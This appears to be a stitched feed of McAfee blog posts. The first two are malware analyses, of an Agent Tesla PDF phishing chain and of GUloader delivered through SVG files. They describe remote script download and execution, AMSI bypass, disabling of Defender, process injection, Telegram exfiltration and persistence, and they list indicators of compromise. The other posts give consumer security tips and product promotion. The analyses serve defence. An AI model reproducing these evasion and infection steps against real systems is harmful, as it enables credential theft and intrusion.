This emerging infection chain involving, among others, Agent Tesla, initiates from an email containing a PDF attachment, which subsequently facilitates the dissemination of the ultimate payload. In the outdated and unpatched version of Acrobat Reader, PDFs directly execute embedded JavaScript using MSHTA, subsequently launching PowerShell, which facilitates process injection. Conversely, in the latest version of Acrobat Reader, PDFs are unable to execute JavaScript directly. Instead, they redirect to a malicious website, from which the script is downloaded. The subsequent process remains consistent with the previous case. The kill chain for the delivery of Agent Tesla unfolds as follows:
Figure 2: Infection Chain
Firstly, we shall address the scenario involving the updated version of Acrobat Reader, as it is likely that the majority of users will have this version installed. Typically, these PDF files are disguised under various themes such as invoices featuring a prominent download button, messages prompting immediate action, or buttons designed to redirect users to seemingly benign destinations.
In a recent attack, a file named “Booking.com-1728394029.pdf” was used. It is evidently targeting users under the guise of being affiliated with Booking.com. It displays a prompt stating, “Lettore non è compatibile!”, which translates to “Player is not compatible,” as depicted in the provided Figure below.
Figure 3: Face of PDF attachment
Upon examining the internal structure of the PDF (Figure 4), it was discovered that within one of the seven objects, some hex data and an embedded URL were identified. The URL highlighted in the red box “https://bit[.]ly/newbookingupdates” is a Bitly URL. Attackers use Bitly URLs to hide malicious links, making them harder to detect. This is especially useful in phishing schemes where they trick users into revealing sensitive information. Bitly’s dynamic links allow attackers to change destinations, enhancing their ability to evade detection. Additionally, attackers exploit the trust associated with Bitly to improve the success of their social engineering tactics.
This URL is intended to connect to https://bio0king[.]blogspot[.]com
Figure 4: Embedded data in PDF
The text in yellow highlighted in Figure 4, appears to be in hexadecimal format. Upon converting it to ASCII, the result is as follows:
Figure 5: ASCII Conversion
This is the reason behind the prompt observed in Figure 3, displaying the same alert message upon opening the PDF document.
After clicking “OK,” another prompt appeared from Adobe Player, cautioning about the connection established to the address mentioned in the prompt i.e. “bit.ly”.
Figure 6: Connection to embedded URL
Upon granting permission for redirection, the user is directed to the website “https://bio0king[.]blogspot[.]com”. Thus, an attempt is made to disguise itself as a legitimate Booking.com website. As illustrated in the figure below, Microsoft Defender SmartScreen alerts the user to the harmful nature of this website. Despite the warning, further analysis was conducted by proceeding to the website to observe subsequent actions.
Figure 7: Connection to disguised website
Upon accessing the website, it was observed that a JavaScript file named “Booking.com-1728394029.js” was promptly downloaded. The js file was intentionally named identically to the PDF file in an effort to deceive users into opening it.
Figure 8: Prompt of JS file download
Immediately upon initiating the download, redirection is triggered to the legitimate Booking.com website, aiming to prevent users from detecting any suspicious activity. The downloaded file is stored in the Downloads folder on the user’s system.
Figure 9: JS file downloaded
The content of the JavaScript file is heavily obfuscated. This tactic is commonly employed by attackers to conceal their code, thus complicating analysis efforts and evading detection mechanisms.
Figure 10: JS file content
Upon executing the JavaScript, the following process tree was observed:
Figure 11: Process tree
Command line:
Upon decoding and executing “Booking.com-1728394029.js,” a URL was acquired: “htloctmain25.blogspot.com/////////////////////////atom.xml.”
Using the PowerShell command line, an attempt was made to access the file located at htloctmain25.blogspot.com/////////////////////////atom.xml, followed by executing the file using Invoke-Expression (iex). In this instance, the attackers attempted to obfuscate the Invoke-Expression (iex) command by using the replace command within the PowerShell command line. As illustrated in the command line, a sleep command was implemented, pausing execution for 5 seconds. Subsequent stages of the infection proceeded after this interval.
The file hosted at http://htloctmain25.blogspot.com/////////////////////////atom.xml is named atom.ps1, measuring approximately 5.5 MB in size. The figure below depicts the content of the file:
Figure 12: Content of .ps1 file
Let’s begin deciphering this script shown in Figure 11 with reference:
The Red marked content at the top of the script indicates that it will terminate several specified processes (“RegSvcs”, “mshta”, “wscript”, “msbuild”, “FoxitPDFReader”), presumably with the intention of injecting the final payload into one of these legitimate binaries. Furthermore, the script creates a directory at “C:\ProgramData\MINGALIES” for potential future utilization.
The Blue marked content within the script represents the decryption function, labeled as “asceeeeeeeeeeeeeeee”. This function is subsequently employed to decrypt various variables within the script.
The Green marked content towards the end of the script outlines the implementation of the persistence mechanism and describes the injection process into legitimate executables.
For reference and ease of comprehension, the variables defined in the script have been numbered accordingly. The decryption instructions for these variables are highlighted in Yellow for clarity and emphasis.
Following the sequence of instructions, if any of the specified processes are terminated, the script proceeds to define variables 1 and 2. Subsequently, the decryption loop is defined in the script. After the decryption loop, variable 3, named “Phudigum”, is defined in the script. Following that, the script decrypts variable 3 and executes the obtained decoded data using the Invoke-Expression (IEX) command.
The content of the decoded variable 3 is as follows:
Figure 13: Variable 3 after decryption
The code first bypasses the Microsoft Windows Anti-Malware Scan Interface (AMSI) scanning by setting a specific value and then proceeds to create registry entries for persistence. The script also defines functions for interacting with the system’s memory and sets global error action preferences to silently continue, suppressing any errors. It checks if a type named AMSIReaper exists and if not, defines this type with various declarations for interacting with the Windows kernel32.dll, including functions related to process memory manipulation.
Furthermore, the script executes a series of malicious actions aimed at compromising the security of the system. It begins by adding exclusions for specific file extensions, paths, and processes in Windows Defender, effectively evading detection for these items. Subsequently, it attempts to alter various Windows Defender preferences, such as disabling critical security features like the Intrusion Prevention System, Real-time Monitoring, and Script Scanning, while also adjusting settings related to threat actions and reporting. Furthermore, the script tries to modify registry settings associated with User Account Control (UAC) and disable the Windows Firewall, further weakening the system’s defenses. Lastly, it resets the global error action preference to continue, potentially concealing any errors encountered during execution and ensuring the script’s malicious actions remain undetected. Overall, these actions indicate a concerted effort to compromise the system’s security and potentially enable further malicious activities.
The subsequent instruction in Figure 11 involves decrypting variable 2, labeled as “bulgumchupitum,” utilizing the decryption function “asceeeeeeeeeeeeeeee.” And the same is executed by Invoke-Expression (IEX) command. Following is the decoded content of variable 2:
Figure 14: Variable 2 after decryption
The content obtained after decrypting variable 2 holds significant importance. The highlighted section in Red does the following:
The next section marked Blue in Figure 13, does the following:
Figure 15: Data 1
Data 1 comprises a .NET DLL file. As previously indicated, the script invokes the method ‘C’ from the type named ‘A.B’. Despite the high level of obfuscation in the file shown in Figure 15, the presence of method ‘C’ can be observed (highlighted in yellow). Additionally, within the script, there is a specific function where the path to framework executables and data are being passed (highlighted within the red box).
Figure 16: Data 1 dll
This DLL is responsible for injecting data2, which is Agent Tesla, as a payload into the Regsvcs.exe process. The following figure shows the configuration of data2. The depicted configuration of data2 disguises it as a legitimate McAfee package file shown in Figure 16. However, it lacks a valid certificate, indicating its fraudulent nature.
Figure 17: Data2
The executable file exhibits a high degree of obfuscation, rendering its content largely unreadable. Numerous methods are present, each bearing meaningless names, a deliberate tactic employed to impede analysis by researchers.
Figure 18: Data2 exe
The attackers have intricately orchestrated the obfuscation process. Each string undergoes decryption through a series of instructions, with specific parameters being passed to obtain the deciphered content. This meticulous approach is designed to add layers of complexity and hinder straightforward analysis. For instance, in Figure 18, through reverse engineering, we can observe how it begins querying the browser for information. The highlighted instruction is the one which after decrypting gives the path of the Opera browser.
Figure 19: Fetching browser information
The following ProcMon logs show all the broswers the malware queried:
Figure 20: Procmon logs of browsers(1)
Figure 21: Procmons logs for browsers(2)
In addition to this, it steals sensitive information such as browser history, cookies, credentials, SMTP information, session information, and email client data such as Otlook profiles, etc.
Figure 22: Credentials
Through debugging the code, we were able to uncover the domain it was utilizing for exfiltration. The following figure shows the URL used for exfiltration:
Figure 23: Domain obtained
The same was evident from Procmon logs shown in the Figure below:
Figure 24: Procmon logs of Connection for exfiltration
The DNS record of IP address 149.154.167.220 belongs to Telegram messenger.
Figure 25: DNS record
AgentTesla leverages Telegram bots for data exfiltration due to several advantageous factors. Firstly, Telegram provides robust end-to-end encryption, ensuring the security of transmitted data. Secondly, the platform offers anonymity for bot creators, enhancing the stealth of malicious activities. Thirdly, Telegram’s user-friendly interface simplifies communication processes for both attackers and their command-and-control infrastructure. Additionally, since Telegram is a widely used messaging platform, traffic to its servers may appear less suspicious compared to other channels, aiding in evading detection. Moreover, Telegram’s infrastructure resilience makes it a reliable option for maintaining communication channels even amidst takedown efforts.
Overall, the combination of security, anonymity, ease of use, stealth, and resilience makes Telegram bots an appealing choice for AgentTesla’s data exfiltration tactics. And to achieve this, it establishes contact with the respective domain associated with the bot and transmits the data, which is then tracked by a specific bot ID.
Figure 26: TelegramBot for exfiltration
In a nutshell, this script was tasked with decoding the payload, retrieving legitimate .NET executable paths, performing process injection to execute the malware, collecting data, and ultimately exfiltrating the acquired information.
Moving forward with atom.ps1 (Figure 11), the next is variable 4, labeled as “koaskodkwllWWW”, and is decrypted using the function “asceeeeeeeeeeeeeeee”. Upon decryption, the content is decoded as follows:
Figure 27: Variable 4 decoded
This script establishes persistence by:
Ultimately, the content highlighted in green in Figure 11 performs the final task. The instructions are as follows:
Figure 28: Persistence instructions
Now, after substituting the values:
We inspected registry entries and scheduled task entries for cross-verification. And the script did as directed:
Figure 29: Registry entry for Persistence
Figure 30: Task Scheduler
Figure 31: Procmon logs for persistence
In summary, the script is configured to execute again after 213 minutes, creating a Run entry named “chromeupdateri” and fetching the atom.ps1 file again from “htljan62024.blogspot.com//////////atom.xml”.
Upon opening the PDF in the old, unpatched version of Acrobat Reader, a prompt immediately appeared indicating the launch of MSHTA along with the entire JavaScript code contained therein. This is depicted in the figure below.
Figure 32: Prompt for embedded javascript
Upon examining the streams of the PDF, we discovered the identical script embedded within the document:
Figure 33: Embedded javascript in PDF
After the launch of MSHTA, an instance of PowerShell is invoked, initiating process injection into Regsvcs.exe and injection of AgentTesla. Consequently, utilizing an old and unpatched version of Acrobat Reader, interaction with the PDF is unnecessary; mere opening of the PDF file results in system infection by the malware.
The chain of events initiates with the delivery of a PDF file containing malicious content. Upon opening the PDF, the embedded malicious code triggers the execution of a JavaScript payload, leading to the download and execution of a PowerShell script. This PowerShell script then decrypts and executes a binary, in the form of a .NET DLL file, which injects AgentTesla payload into legitimate processes to evade detection. The malware communicates with command-and-control servers, exfiltrating sensitive data through Telegram bots for stealthy transmission. To ensure persistence, the malware establishes scheduled tasks and registry entries, allowing it to execute periodically and maintain its presence on the infected system. In the old version of Acrobat Reader, opening the PDF triggered the automatic execution of malicious JavaScript, leading to the injection of AgentTesla malware via PowerShell into Regsvcs.exe. Inspection of the PDF streams revealed the embedded script, further confirming the exploitation of vulnerabilities without requiring user interaction. This orchestrated sequence underscores the sophisticated nature of the attack, spanning from initial infection to data exfiltration and persistent infiltration, posing significant challenges for detection and mitigation efforts.
Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:
| 8f8264c173e6d036e87b706dbb87e3036ae17df32e53a683c87bff94fce2c242 | |
| Javascript | 3ea81c292f36f2583d2291e8a393014da62767447dba7b139a6c45574647aa2b |
| ps1 file | db726e060f4feccf4bdfa843e3c10cbac80509585fd55c6d1bfce5e312a4e429 |
| dll | 5b6d8f91201ba9c879e46062190817954e28ceb61a67e55870bb61d1960854ee |
| exe | dec2ce698ab8600d96dd3353b5e47d802441c6df18aed1dd6a2b78311369659e |
| IPv4 | 149.154.167.220 |
| URL | http://htloctmain25.blogspot[.]com/atom.xml |
| URL | https://bio0king[.]blogspot[.]com |
Table 1: Indicators of Compromise
The post Rise in Deceptive PDF: The Gateway to Malicious Payloads appeared first on McAfee Blog.
Over the past year and a half, workers everywhere have gotten used to working from home. They have adopted an entirely new work from home mindset and diverted their weekly commuting hours to other productive and more enjoyable pursuits. As parts of the world return to a “new normal,” another change is on the way: a gradual return to the office.
The hybrid working model is met with mixed reviews from employees and business security teams alike. For some employees, a clearer separation between work and home is a welcome change. CTV News reports 66% of Canadian respondents to an International Workplace Group poll say they are looking forward to splitting their working hours between the office and home.
For business security teams who are just catching their breath after the monumental shift to a remote workforce, they are now gearing up for the new online safety challenges posed by the hybrid work model. According to a VMware Canada Threat Report, 86% of security professionals agree that cyberattacks aimed at their organizations have become more sophisticated since the onset of the pandemic. Additionally, 91% of global respondents cite employees working from home as the cause of cyberattacks. Challenges of the hybrid workforce include the constant back-and-forth of company-issued devices, the lack of control over home office setups, and mixing personal and company devices with company and personal business respectively. For example, if you pay your bills or shop online using your work device, it opens several new avenues for a hacker to walk right onto the corporate network. When your guard is down even a little bit when you are off the clock, you could fall victim to e-skimmers, fake login pages, or phishing scams.
No matter how advanced your company’s threat detection system, hackers know where vulnerabilities lie and are on the hunt to exploit them. Check out these tips to ensure you are not the weak link in your organization.
A virtual private network (VPN) is a service that scrambles online browsing data, making it impossible for nefarious characters to decipher your activity. This is an excellent way to deter hackers from tracking your movements and picking up sensitive pieces of information.
VPNs are essential if you are working in a public area, sharing a wireless network with strangers, or using a Wi-Fi connection that is not password protected. Public Wi-Fi networks are notoriously easy pickings for hackers seeking entry into unsuspecting users’ devices. On the days where you are not in the office, make sure your wireless connection is secure.
While a VPN is an excellent tool, security measures and your accounts are vulnerable without a strong and private password or passphrase to protect them. The gigantic Colonial Pipeline hack is being blamed on a hacker gaining entry through an unused VPN that was not secured with multifactor authentication. Multifactor authentication is an online safety measure where more than one method of identity verification is needed to access the valuable information that lies within password-protected accounts.
Consider using a password manager to organize all your passwords and logins. Password managers remember each pairing so you don’t have to, plus most managers are secured with multifactor authentication. A password manager makes it easier to add variety to your passwords and prevents you from ever having to write them down.
Professionals who travel between their home and an office are likely transporting their devices back and forth, increasing the number of opportunities for devices to be forgotten at either location or in transit. As convenient as it may be, never use your personal device for official business. Even if you pride yourself on sound online safety habits, your company device likely has more defenses ingrained in its hardware than your personal devices.
With your personal devices, you should carefully vet everything you download. With your work-issued devices, this vetting process is even more important as company information is at stake. The Information and Privacy Commissioner of Ontario states that employees should never download applications to their work devices without permission from the IT team. Apps and programs often have security vulnerabilities that could open a gateway for hackers.
Zero Trust is a security philosophy that is exactly what it sounds like: trust no one. Businesses are employing Zero Trust models to greatly limit who has access to sensitive data sources. Adopt your own personal Zero Trust philosophy concerning your passwords, logins, and device access. This means never sharing passwords or log in details, especially over email, instant messenger, or over a video conference. Hackers commonly eavesdrop on all three mediums. Also, even your most trusted coworker could mishandle your passwords and login details, such as writing them down and leaving them in a public place.
A key aspect of the Zero Trust model is only granting employees access to platforms that are vital to their job. Sharing your logins with coworkers who may not be authorized for using that platform undermines all the hard work the IT team does to keep tabs on data access.
Every time you turn on the nightly news, another ransomware attack has hit another organization, each one bigger than the last. This heightened prevalence is a reflection on the wiliness of hackers, but also the number of security holes every company must plug.
There are several vulnerable points of entry in every company, and some of those vulnerabilities are heightened by the hybrid work model. Always heed the advice of your company’s IT team, and make sure to do your part to keep your devices and work information secure.
The post Hybrid Workplace Vulnerabilities: 4 Ways to Promote Online Safety appeared first on McAfee Blog.
Authored by: Vignesh Dhatchanamoorthy
In the ever-evolving landscape of cybersecurity threats, staying ahead of malicious actors requires a deep understanding of their tactics and tools. Enter GUloader, a potent weapon in the arsenal of cybercriminals worldwide. This sophisticated malware loader has garnered attention for its stealthy techniques and ability to evade detection, posing a significant risk to organizations and individuals.
One of GUloader’s distinguishing features is its utilization of evasion techniques, making it particularly challenging for traditional security measures to detect and mitigate. Through polymorphic code and encryption, GUloader can dynamically alter its structure, effectively masking its presence from antivirus software and intrusion detection systems. This adaptability enables GUloader to persistently infiltrate networks and establish footholds for further malicious activity.
McAfee Labs has observed a recent GUloader campaign being distributed through a malicious SVG file delivered via email.
The SVG (Scalable Vector Graphics) file format is a widely used vector image format designed for describing two-dimensional vector and mixed vector/raster graphics in XML. One of the key features of SVG files is their support for interactivity and animation, achieved through JavaScript and CSS.
Modern web browsers such as Google Chrome, Mozilla Firefox, and Microsoft Edge have built-in support for rendering SVG files. When you open an SVG file in Chrome or Firefox, the browser renders the vector graphics using its built-in SVG rendering engine. This engine interprets the XML-based SVG code and displays the image accordingly on the web page.
Browsers treat SVG files as standard web content and handle them seamlessly within their browsing environments.
Figure 1: Infection chain
The execution process begins with the opening of an SVG file from an email attachment. This action triggers the browser to download a ZIP file. Within this ZIP file is a WSF (Windows Script File), acting as the conduit for the subsequent stage. Upon execution of the WSF, wscript calls the PowerShell command to establish a connection with a malicious domain and execute the hosted content. This content includes shellcode injected into the MSBuild application, facilitating further malicious actions.
Figure 2: Process Tree
A recipient receives a spam email that contains malware embedded in archived attachments. The attachment contains a malicious SVG file named “dhgle-Skljdf.svg”
Figure 3: Spam Email
JavaScript that was smuggled inside of the SVG image contained the entire malicious zip archive. When the victim opened the attachment from the email the smuggled JavaScript code inside the SVG image created a malicious zip archive, and then presented the user with a dialog box to decrypt and save the file.
Figure 4: Saving file prompt
The SVG file utilizes a Blob object that contains the embedded zip file in base64 format. Subsequently, the zip file is dropped via the browser when accessed.
Figure 5: SVG file code
Inside the zip file, there is an obfuscated WSF (Windows Script File). The WSF script employs several techniques to make analysis quite difficult.
Figure 6: Obfuscated WSF Script
It invokes PowerShell to establish a connection with a malicious domain, subsequently executing the hosted content retrieved from it.
Encoded PowerShell
Figure 7: Encoded PowerShell code
After Decoding
Figure 8: Decoded PowerShell code
URL: hxxps://winderswonders.com/JK/Equitably.mix
The URL hosts base64-encoded content, which, after decoding, contains shellcode and a PowerShell script.
Hosted Content
Figure 9: Hosted Base64 content
After decoding Base64
Figure 10: Decoded Base64 content
The above PowerShell script attempts to load the shellcode into the legitimate MSBuild process using the Process Hollowing technique.
After injection, the shellcode executes anti-analysis check then it modifies the Registry run key to achieve persistence.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
The final stage uses the injected shellcode to download and execute the final malicious executable. GuLoader can also download and deploy a wide range of other malware variants.
| File | SHA256/URL |
| 66b04a8aaa06695fd718a7d1baa19386922b58e797634d5ac4ff96e79584f5c1 | |
| SVG | b20ea4faca043274bfbb1f52895c02a15cd0c81a333c40de32ed7ddd2b9b60c0 |
| WSF | 0a196171571adc8eb9edb164b44b7918f83a8425ec3328d9ebbec14d7e9e5d93 |
| URL | hxxps://winderswonders[.]com/JK/Equitably[.]mix |
The post GUloader Unmasked: Decrypting the Threat of Malicious SVG Files appeared first on McAfee Blog.
Imagine a tool that can transform text into captivating videos, bridging the gap between imagination and reality by creating videos that look “lifted from a Hollywood movie” in minutes. In a world where technology continues to push boundaries, OpenAI is once again at the forefront of innovation with the unveiling of Sora, a groundbreaking text-to-video artificial intelligence (AI) model.
But what are the implications for personal internet security? As Sora enters the scene with its remarkable abilities, there arises a concern about how such advanced AI technology might impact the safety of online interactions and the potential for misuse or manipulation of generated content.
What is Sora?
OpenAI is the creator behind the ChatGPT AI chatbot. Their creation of Sora represents a leap forward in AI capabilities.
Sora transforms text prompts into videos. Previously, videos created by AI have had issues like choppiness and distortion; it was easy to tell that it was AI-generated content. In contrast, Sora’s video creation capabilities are adept at crafting intricate scenes with vivid characters and dynamic motion. While Sora still has limitations, its ability as an instant video generator far surpasses what has been seen before.
Currently, OpenAI is having Sora evaluated by cybersecurity professionals to identify critical areas for potential harm. As with any emerging technology, it’s essential to approach Sora with caution, recognizing both its benefits and its potential risks.
Top Internet Safety Concerns About Sora
Scammers and cybercriminals are likely to employ AI video generation for their deceptive purposes. Here are some of the dishonest applications of AI video generators to be aware of:
How to Stay Safe Against AI-generated Video Content
Protecting yourself against the risks associated with AI-generated video content is paramount in today’s digital landscape. Here are some key strategies to stay safe:
While it’s essential to acknowledge the new risks to personal internet security brought about by advances in AI video generation, the future isn’t a daunting place—it’s brimming with endless technological possibilities!
Embrace these opportunities with confidence, knowing that McAfee has your back. To protect your online privacy, devices, and identity, entrust your digital safety to McAfee+. McAfee+ includes $1 million in identity theft coverage, virtual private network (VPN), Personal Data Cleanup, and more.
The post What is Sora and What Does It Mean for Your Personal Internet Security? appeared first on McAfee Blog.
If you’re concerned about your privacy on social media, you have plenty of company. Here’s something else you have — a great way to lock it down.
Just how concerned are people about their privacy on social media? We asked. Worldwide, 73% of social media users said they’re highly concerned with their security and privacy on social media platforms.
And for parents of teens, those concerns about privacy on social media weigh even heavier. Fresh insights published by Pew Research[i] reveal that nearly 1 in 5 teens in the U.S. said they’re on YouTube and TikTok “almost constantly.”
With social media usage and privacy concerns so high, we created McAfee’s Social Privacy Manager.
If you’ve ever taken a dive into the privacy settings on your social media accounts, you know just how deep they can go. And if you haven’t, it can involve dozens of individual menus and settings. In all, it can get tricky when it comes time to setting them the way you like. It’s a lot of work. Plenty of work when you consider how platforms change and update their settings over time.
Our Social Privacy Manager does that work for you, automatically adjusting more than 100 privacy settings across all the accounts you choose. As a result, you can reduce the amount of data being collected and ensure your info is only visible to the people you want to share it with — which can help keep your personal info out of the wrong hands. As we’ll see, social media provides a wealth of info that hackers and scammers can potentially use against you.
That’s why privacy on social media matters so much. Let’s start with a look at what bad actors are up to on social media and at how much time teens are spending on it. From there, we’ll hop into how quickly and easily McAfee’s Social Privacy Manager can help keep you and your family far safer than before.
For some time, we’ve seen how hackers and scammers use social media to fuel their attacks and scams. It’s an open book. A book about you. Your likes, your life, not to mention the photos of where you go, what you like to do, and who you do it with. That info is as good as gold for hackers and scammers.
With that exacting kind of info, bad actors out there can commit identity theft and cook up phishing scams using relevant info about you. An analogy explains how. Your identity is like a puzzle, and various pieces of personal info are the pieces. With enough pieces, a bad actor can put together a puzzle picture of you. One that’s complete just enough to open a loan, make an insurance claim, or pose as you in some way.
For those pieces, they’ll turn to info found on the dark web, info readily available from online data brokers, and yet more info from social media. Already, we have products and features that protect your identity on the dark web and that help remove your info from sketchy data broker sites. Now, our Social Privacy Manager helps you shut down one more source of info from bad actors — a source they successfully tap into.
According to the U.S. Federal Trade Commission (FTC), scammers recently used social media as a contact method in 11% of the fraud and identity theft cases where victims cited a method.
Source: FTC
While that figure finds itself somewhat in the middle of the pack in terms of contact methods, it was the second-most effective method as it led to a loss 61% of the time. Only ads and pop-ups worked more effectively at 63%, making social media a goldmine for hackers and scammers indeed.
Earlier, we mentioned just how much time teens spend on social media. Taking a deeper dive into the numbers provided by Pew Research, we can see a couple of things — the top platforms they use and how often they use them:
YouTube absolutely leads the way with 93% of U.S. teens using that social media platform. Right behind it, TikTok, Snapchat, and Instagram. Also on this chart, you can spot the steep ten-year decline of Facebook and Twitter (X), a particularly precipitous drop for Facebook of more than half.
As for how often teens visit these platforms daily, the same names follow in order. YouTube takes the number one spot yet again, with 71% of teens saying they use it daily. In all, teens are telling us that social media factors into a large part of their day. “Almost constantly” for some.
From a parental standpoint, the privacy implications are clear. High use leads to high exposure and the potential privacy risks that follow. Not to mention possible exposure to scams just as adult social media users might encounter.
Without question, this makes privacy on social media a family matter.
While social media provides bad actors with another avenue to commit crimes online, you can still use social media safely in a way that reduces your risk.
With our Social Privacy Manager, you can determine what you do and don’t want to share. It scans the accounts you enter and offers suggestions that can improve your privacy. You select which ones you want to enable, and the app makes the updates with a single click.
Making it even simpler, you can also secure your privacy based on what kind of social media user you are. Whether you just tend to hang back, explore, or put yourself out there a bit more, there’s a privacy setting for you. And if you change your mind, it can help change your settings whenever you like.
If it all seems rather straightforward and simple, it is. We designed it so that you don’t have to dig through menu after menu to uncover every setting and then make the informed choice you want to make. The app does the work for you. And you can run it any time and update your settings as you like. In fact, we suggest running checks regularly as platforms can and do change their privacy settings and policies.
And as we saw above, teens are on social media. A lot. Note that you can use our Social Privacy Manager on the accounts your teens have too. It’s just a matter of running through the same steps with each of their accounts. This way, everyone in the family can boost their privacy on social media.
You can find McAfee’s Social Privacy Manager in our McAfee+ online protection plans. In conjunction with a host of other features like Identity Monitoring and Personal Data Cleanup, you can thoroughly protect your privacy and identity. On social media and anywhere else your travels take you online.
You can take a peek of Social Privacy Manager here:
In all, the last several years have seen numerous advances that make it easier, and quicker, to protect your privacy and identity. Old, manual processes that were spread out across umpteen sites and services are now automatic. And guided too. McAfee’s Social Privacy Manager stands as yet one more of those advances.
True, going online carries its risks. Social media complicates them more so. Yet you can reduce those risks, significantly so. You really can lock down your privacy. Quickly and easily, for you and your family.
[i] https://www.pewresearch.org/internet/2023/12/11/teens-social-media-and-technology-2023/
The post Introducing Social Privacy Manager appeared first on McAfee Blog.
This year marks the world’s biggest election year yet.
An estimated four billion voters will head to the polls across more than 60 national elections worldwide in 2024 — all at a time when artificial intelligence (AI) continues to make history of its own. Without question, the harmful use of AI will play a role in election interference worldwide.
In fact, it already has.
In January, thousands of U.S. voters in New Hampshire received an AI robocall that impersonated President Joe Biden, urging them not to vote in the primary. In the UK, more than 100 deepfake social media ads impersonated Prime Minister Rishi Sunak on the Meta platform last December[ii]. Similarly, the 2023 parliamentary elections in Slovakia spawned deepfake audio clips that featured false proposals for rigging votes and raising the price of beer[iii].
We can’t put it more plainly. The harmful use of AI has the potential to influence an election.
In just over a year, AI tools have rapidly evolved, offering a wealth of benefits. It analyzes health data on massive scales, which promotes better healthcare outcomes. It helps supermarkets bring the freshest produce to the aisles by streamlining the supply chain. And it does plenty of helpful everyday things too, like recommending movies and shows in our streaming queues based on what we like.
Yet as with practically any technology, whether AI helps or harms is up to the person using it. And plenty of bad actors have chosen to use it for harm. Scammers have used it to dupe people with convincing “deepfakes” that impersonate everyone from Taylor Swift to members of their own family with phony audio, video, and photos created by AI. Further, AI has also helped scammers spin up phishing emails and texts that look achingly legit, all on a massive scale thanks to AI’s ease of use.
Now, consider how those same deepfakes and scams might influence an election year. We have no doubt, the examples cited above are only the start.
Within this climate, we’ve pledged to help prevent deceptive AI content from interfering with this year’s global elections as part of the “Tech Accord to Combat Deceptive Use of AI in 2024 Elections.” We join leading tech companies such as Adobe, Google, IBM, Meta, Microsoft, and TikTok to play our part in protecting elections and the electoral process.
Collectively, we’ll bring our respective powers to combat deepfakes and other harmful uses of AI. That includes digital content such as AI-generated audio, video, and images that deceptively fake or alter the appearance, voice, or actions of political candidates, election officials, and other figures in democratic elections. Likewise, it further covers content that provides false info about when, where, and how people can cast their vote.
A set of seven principles guide the way for this accord, with each signatory of the pledge lending their strengths to the cause:
In all, we see the tech accord as one important step that tech and media companies can take to keep people safe from harmful AI-generated content. Now in this election year. And moving forward as AI continues to shape and reshape what we see and hear online.
Yet beyond this accord and the companies that have signed on remains an important point: the accord represents just one step in preserving the integrity of elections in the age of AI. As tech companies, we can, and will, do our part to prevent harmful AI from influencing elections. However, fair elections remain a product of nations and their people. With that, the rule of law comes unmistakably into play.
Legislation and regulations that curb the harmful use of AI and that levy penalties on its creators will provide another vital step in the broader solution. One example: we’ve seen how the U.S. Federal Communications Commission’s (FCC) recently made AI robocalls illegal. With its ruling, the FCC gives State Attorney Generals across the country new tools to go after the bad actors behind nefarious robocalls[iv]. And that’s very much a step in the right direction.
Protecting people from the ill use of AI calls for commitment from all corners. Globally, we face a challenge tremendously imposing in nature. Yet not insurmountable. Collectively, we can keep people safer. Text from the accord we co-signed puts it well, “The protection of electoral integrity and public trust is a shared responsibility and a common good that transcends partisan interests and national borders.”
We’re proud to say that we’ll contribute to that goal with everything we can bring to bear.
[i] https://apnews.com/article/new-hampshire-primary-biden-ai-deepfake-robocall-f3469ceb6dd613079092287994663db5
[ii] https://www.theguardian.com/technology/2024/jan/12/deepfake-video-adverts-sunak-facebook-alarm-ai-risk-election
[iii] https://www.bloomberg.com/news/articles/2023-09-29/trolls-in-slovakian-election-tap-ai-deepfakes-to-spread-disinfo
[iv] https://docs.fcc.gov/public/attachments/DOC-400393A1.pdf
The post McAfee Joins Tech Accord to Combat Use of AI in 2024 Elections appeared first on McAfee Blog.
When you open your laptop or your mobile device, what is the first thing you do? Do you head to your favorite social media site to skim the latest news, or do you place your weekly grocery delivery order? No matter what your daily online habits are, even the slightest degree of caution can go a long way in staying secure online.
That’s because hackers are experts at hiding malware in your everyday online routines, or even infiltrating your cookies to steal login information and learn about your personal preferences.
According to a StatsCan Canadian internet use survey, six out of ten internet users reported experiencing a cybersecurity incident. There are many hoops to jump through when navigating the digital landscape. By taking the necessary steps to remedy vulnerabilities in your digital activity, you can dramatically improve your online protection.
Cybercriminals take advantage of online users through routine avenues you would not expect. Here are three common ways that cybercriminals eavesdrop on online users.
Adware, or advertising-supported software, generates ads in the user interface of a person’s device. Adware is most often used to generate revenue for the developer by targeting unsuspecting online users with personalized ads paid by third parties. These third parties usually pay per view, click, or application installation.
Though not always malicious, adware crosses into dangerous territory when it is downloaded without a user’s consent and has nefarious intent. In this case, the adware becomes known as a potentially unwanted application (PUA) that can remain undetected on users’ devices for long periods of time. According to a report by the Cybersecure Policy Exchange, an unintentionally installed or downloaded computer virus or piece of malware is one of the top five cybercrimes that Canadians experience. The PUA can then create issues like frequent crashes and slow performance.
Users unknowingly download adware onto their device when they download a free ad-supported program or visit a non-secure site that does not use the Hypertext Transfer Protocol Secure (HTTPS) to encrypt online communication.
Hackers also use invasive tactics known as ad injections, where they inject ads with malicious code for increased monetary gain. This is a practice known as “malvertising.” If a user clicks on a seemingly legitimate and well-placed ad, they risk exposing themselves to numerous online threats. These ads can be infected with malware such as viruses or spyware. For example, hackers can exploit browser vulnerabilities to download malware, steal information about the device system, and gain control over its operations. Hackers can also use malvertising to run fraudulent tech support scams, steal cookie data, or sell information to third-party ad networks.
Another vulnerability that many may not realize is their browser’s built-in autofill functions. As tempting as it is to use your browser’s autofill function to populate a long form, this shortcut may not be safe. Cybercriminals have found ways to capture credentials by inserting fake login boxes onto a web page that users cannot see. So, when you accept the option to autofill your username and password, you are also populating these fake boxes.
Take a proactive approach to your digital protection the next time you are browsing the internet by reassessing your online habits. Check out these five tips to ensure you are staying as safe as possible online.
Cookie data can contain anything from login information to credit card numbers. Cybercriminals looking to exploit this information can hijack browser sessions to pose as legitimate users and steal cookies as they travel across networks and servers. As a result, it is essential for online users to regularly clear out their cookies to better protect their information from falling into the wrong hands. Navigate to your browser’s history, where you can wipe the data associated with each browser session, including your cookies.
Clearing your browser’s cookie data will also remove your saved logins, which is why leveraging a password manager can make it easier to access regularly visited online accounts.
Many browsers come with a built-in password generator and manager; however, it is better to entrust your logins and password to a reputable password manager. Browser password managers are not as secure as password managers, because anyone who has access to your device will also access your online information. A password manager, provides a more secure solution since it requires you to log in with a separate master password. A password manager also works across various browsers and can generate stronger passwords than those created by your browser.
